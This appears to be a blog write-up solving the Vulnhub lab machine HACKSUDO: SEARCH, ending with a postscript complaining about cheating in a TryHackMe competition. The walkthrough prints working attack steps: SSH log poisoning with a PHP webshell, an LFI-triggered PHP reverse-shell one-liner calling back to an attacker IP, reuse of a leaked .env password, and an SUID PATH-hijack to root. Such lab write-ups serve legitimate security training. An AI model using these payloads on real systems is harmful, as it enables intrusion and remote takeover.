This is HACKSUDO: SEARCH from Vulnhub. It says:

This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b)

Ports

SSH and HTTP only.

Web

The basic dirsearch:

python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.209

gives me a few things, including this:

[06:23:34] 200 - 306B - /.env

And in there are some creds and other stuff:

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!

Note we didn’t have an open SQL port though. We need a bigger feroxbuster search:

feroxbuster -u http://192.168.1.209 -w /usr/share/seclists/Discovery/Web-Content/big.txt -C 403 -x php,txt

to find this:

200 137l 288w 2918c http://192.168.1.209/search1.php

Which is what we want. Here, we find this hilarious link:

http://192.168.1.209/search1.php?FUZZ=contact.php

Along with the comment:

find me @hacksudo.com/contact @fuzzing always best option

Well, we better do what the man says. I use Burp Suite Turbo Intruder with /usr/share/seclists/Discovery/Web-Content/common.txt, and find the parameter we want is me

LFI

So we have LFI at http://192.168.1.209/search1.php?me=/etc/passwd

A bit of enumeration reveals we cannot read the apache logs, but we can read /var/log/auth.log so we poison SSH:

┌──(root💀kali)-[/opt/vulnhub/hacksudo_search]
└─# ssh '<?php system($_GET['cmd']); ?>'@192.168.1.209 

And then I think I used the PHP one liner for a shell. I tried a few before one worked; I think this one did:

/search1.php?me=/var/log/auth.log&cmd=php+-r+'$sock%3dfsockopen("192.168.1.208",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'

Privesc

Remember that password from before? Yeah.

www-data@HacksudoSearch:/home$ ls -lash
ls -lash
total 24K
4.0K drwxr-xr-x  6 root     root     4.0K Apr 15 02:50 .
4.0K drwxr-xr-x 18 root     root     4.0K Apr 11 07:31 ..
4.0K drwxr-x---  6 hacksudo hacksudo 4.0K Apr 15 03:14 hacksudo
4.0K drwxr-x---  2 john     john     4.0K Apr 13 03:21 john
4.0K drwxr-x---  2 monali   monali   4.0K Apr 13 03:21 monali
4.0K drwxr-x---  2 search   search   4.0K Apr 15 02:50 search
www-data@HacksudoSearch:/home$ su search
Password: MyD4dSuperH3r0!
su: Authentication failure
www-data@HacksudoSearch:/home$ su john
Password: MyD4dSuperH3r0!
su: Authentication failure
www-data@HacksudoSearch:/home$ su monali
Password: MyD4dSuperH3r0!                                                               su: Authentication failure                                                     
www-data@HacksudoSearch:/home$ su hacksudo                     
Password: MyD4dSuperH3r0!                                                               
hacksudo@HacksudoSearch:/home$ cd hacksudo
hacksudo@HacksudoSearch:~$ sudo -l
sudo -l
bash: sudo: command not found

I knew we’d get there eventually. Now what?

hacksudo@HacksudoSearch:~/search/tools$ ls -lash
ls -lash
total 32K
4.0K drwxr-xr-x 2 hacksudo hacksudo 4.0K Apr 15 02:57 .
4.0K drwxr-xr-x 4 hacksudo hacksudo 4.0K Apr 14 03:50 ..
   0 -rw-r--r-- 1 hacksudo hacksudo    0 Apr 15 02:57 file
 20K ---Sr-xr-x 1 root     root      17K Apr 14 03:36 searchinstall
4.0K -rw-r--r-- 1 hacksudo hacksudo   78 Apr 14 03:34 searchinstall.c
hacksudo@HacksudoSearch:~/search/tools$ file sear
file searchinstall
searchinstall: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=36393d16c6d4da7804ed34057edeb73d7ebf0b08, not stripped
hacksudo@HacksudoSearch:~/search/tools$ cat searchinstall.c
cat searchinstall.c
#include<unistd.h>
void main()
{       setuid(0);
        setgid(0);
        system("install");
}
hacksudo@HacksudoSearch:~/search/tools$ echo sh > install
echo sh > install
hacksudo@HacksudoSearch:~/search/tools$ chmod +x install 
chmod +x install
hacksudo@HacksudoSearch:~/search/tools$ export PATH=.:$PATH
export PATH=.:$PATH
hacksudo@HacksudoSearch:~/search/tools$ ./searchinstall
./searchinstall
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(hacksudo)
HacksudoSearch
Mon 26 Apr 2021 07:01:30 AM EDT
# cat /root/root.txt
cat /root/root.txt
# snip ascii art
You Successfully Hackudo search box 
rooted!!!

flag={9fb4c0afce26929041427c935c6e0879}

So it’s an SUID binary, calling ‘install’ without a path. Create our own, export PATH and call the binary; no problem.

Postscript

I’ve been banging up against Year of the Jellyfish at THM and I just want to say a few words about it. It’s described thus:

This box is part of an OSCP voucher giveaway (prize kindly donated by @q8fawazo)! Root the box before 6PM UTC on the 30th of April 2021 to be entered into the prize draw. The winner will be chosen by raffle at that time, streamed and announced in the TryHackMe Discord server, so please make sure to join and verify if you wish to be entered in the competition. If you do not want to be entered, or are ineligible to use the voucher (under 18 years old, or already OSCP certified / have access to the PEN-200 (PWK) Materials), please ping @MuirlandOracle in the help channel for this room on the Discord to discuss this. There are also 5 One Month TryHackMe Subscription Vouchers to be given away in the same fashion (courtesy of @Virtual_Lad)

It goes without saying that any signs of cheating will result in an immediate and permanent ban – both from the competition and from the site/community.

I’ve got a shell and the first of two flags, but I haven’t rooted it (yet). I don’t consider myself ready for OSCP and I don’t want the voucher, but it’s a tasty challenge to try to complete anyway.

But I’ve been following the conversation in the discord about it, and apparently people are now cheating, so someone has figured it out and has told others how to do it. Foothold is easy once you’ve figured out how, but I don’t know what root is although I gather it’s unusual; I haven’t been able to figure it out yet. But let’s say you cheat and:

  1. get away with it, and
  2. win the voucher

Now what? Surely if you have to cheat to solve this thing then OSCP will crush you. And if you’re so lazy that you’ve got the skills to solve the challenge but can’t be bothered, WTF? I honestly don’t understand. Anyway I got sick of it so I went and did this Vulnhub box instead.